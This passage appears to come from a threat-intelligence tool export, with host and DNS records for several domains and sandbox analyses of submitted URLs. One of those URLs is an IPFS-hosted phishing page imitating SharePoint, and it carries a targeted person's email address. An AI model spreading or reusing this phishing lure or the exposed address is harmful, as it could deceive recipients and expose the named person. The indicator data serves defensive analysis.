"2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", 
"resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", 
"why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", 
"rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:52:35 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html#adeajiboye%40tfl.gov.uk', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html#adeajiboye%40tfl.gov.uk', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ff8_ConnHashTable<4088>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ff8_IE_EarlyTabStart_0xccc_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ff8_IESQMMUTEX_0_303"\n "IsoScope_ff8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.94.90.1:443"\n "185.199.108.153:443"\n "69.16.175.42:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "code.jquery.com"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', 
u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df220c6963395ab279.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eb5e3e79-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df03903f02ca632e35.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eb5e3e7b-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\1hgch0kk.txt"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[3].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[2].ico"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 
6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eb5e3e79-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df220c6963395ab279.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.linksharepoint.html#adeajiboye%40tfl.gov.uk" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "CabC98.tmp" has type "data"- Location: [%TEMP%\\CabC98.tmp]- [targetUID: 00000000-00003752]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004088]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF220C6963395AB279.TMP" has type "data"- Location: [%TEMP%\\~DF220C6963395AB279.TMP]- [targetUID: 00000000-00004088]\n "~DFD673A39745136900.TMP" has type "data"- Location: [%TEMP%\\~DFD673A39745136900.TMP]- [targetUID: 00000000-00004088]\n "~DF03903F02CA632E35.TMP" has type "data"- Location: [%TEMP%\\~DF03903F02CA632E35.TMP]- [targetUID: 00000000-00004088]\n "~DF4CF5FEB5537E8681.TMP" has type 
"data"- Location: [%TEMP%\\~DF4CF5FEB5537E8681.TMP]- [targetUID: 00000000-00004088]\n "_EB5E3E7B-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._EB5E3E79-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F40A39E6-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "CE6PK5S8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CE6PK5S8.txt]- [targetUID: 00000000-00004088]\n "NIMW53JC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NIMW53JC.txt]- [targetUID: 00000000-00004088]\n "QCNMHTZN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QCNMHTZN.txt]- [targetUID: 00000000-00004088]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003752]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "BZQCY431.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BZQCY431.txt]- [targetUID: 00000000-00004088]\n "GWHYI938.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GWHYI938.txt]- [targetUID: 00000000-00004088]\n "UZP7J6YA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UZP7J6YA.txt]- [targetUID: 00000000-00004088]\n "5DVSSG1V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5DVSSG1V.txt]- [targetUID: 00000000-00004088]\n "sharepoint_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "CabF738.tmp" has 
type "data"- Location: [%TEMP%\\CabF738.tmp]- [targetUID: 00000000-00003752]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003752]\n "CabF749.tmp" has type "data"- Location: [%TEMP%\\CabF749.tmp]- [targetUID: 00000000-000 | 185.199.108.153 |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000407.github.io |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:80 | 188.114.97.0/24 |
| 2023-05-12 02:51:54 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, 
u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" 
(Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: 
"ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 